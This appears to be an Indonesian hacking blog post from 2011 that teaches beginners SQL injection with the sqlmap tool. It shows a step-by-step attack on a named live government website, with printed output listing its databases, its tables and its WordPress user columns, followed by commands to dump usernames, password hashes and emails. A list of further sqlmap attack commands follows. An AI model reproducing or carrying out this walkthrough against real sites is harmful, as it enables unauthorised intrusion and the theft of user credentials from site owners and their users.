30 September 2011

Filled Under:

Sqlmap Tool For Beginners


Sql Injection merupakan tekhnik dari sekian tekhnik yang sering di lakukan oleh hacker dalam melakukan penetrasi. Hal ini dikarenakan bug sql injection sering kita jumpai pada banyak website di internet.

Nah, kali ini saya coba sharing cara hacking dengan tekhnik sql injection. Akan tetapi dengan bantuan tool SqlMap. Terimakasih tentunya untuk pengembangnya yakni Bernardo Damele AG & Miroslav Stampar yang telah mempermudah kita untuk melakukan penetrasi.

Aplikasi mendukung beberapa database : MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Enam tekhnik sql-injection : boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band. Dan fitur - fitur lain sebagainya..

Nah bagi anda pengguna windows xp, vista, 7 dan 8,  anda pun dapat menggunakannya.
Yakni dengan install  python di komputer anda. Silahkan download kedua paket ini :

Phyton :   http://www.python.org/download/
Sqlmap :     http://sqlmap.sourceforge.net/

Cukup download Sqlmap dan letakkan di direktori PC kita. Disini saya misalkan sqlmap di direktori C:


1. Sqlmap Live Target

Tentunya saya akan coba penetrasi pada website target, moga-moga paham :)

Web target : http://www.psf.gov.pk/staffdetail.php?id=10

code :     
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --dbs

available databases [2]:
[*] information_schema
[*] psfdb

code :      
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --tables psfd

 +-----------------------------------+
| user                                    |
| users_site                           |
| wp_commentmeta               |
| wp_comments                     |
| wp_links                             |
| wp_options                         |
| wp_options2                       |
| wp_postmeta                      |
| wp_posts                            |
| wp_term_relationships        |
| wp_term_taxonomy             |
| wp_terms                            |
| wp_usermeta                       |
| wp_users                             |
+-----------------------------------+

 
code :
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --columns -D psfdb -T wp_users 

 

+---------------------------+-------------------------+
| Column                    | Type                       |
+---------------------------+-------------------------+
| display_name           | varchar(250)            |
| ID                            | bigint(20) unsigned  |
| user_activation_key | varchar(60)              |
| user_email               | varchar(100)            |
| user_login                | varchar(60)             |
| user_nicename         | varchar(50)             |
| user_pass                 | varchar(64)             |
| user_registered        | datetime                 |
| user_status               | int(11)                    |
| user_url                    | varchar(100)           |
+---------------------------+------------------------+


code :
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --dump -D psfdb -T wp_users

code:
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 -D psfdb -T wp_users -C user_login,user_pass,user_email --dump 

Than tou will see the dump database in C:\Hack\sql\sqlmap\output


2. Some Powerfull Command Sqlmap



sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users

sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users (HTTP Data)

sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users

sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" \
--auth-type Basic --auth-cred "testuser:testpass"


sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper \
tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns \
-D testdb -T users -C name (Enumerate database table columns)



Jika ingin lebih mengetauhi perintah - perintah di sqlmap.

Kita bisa mendapatkan pencerahan di sini

Goodluck !






0 komentar: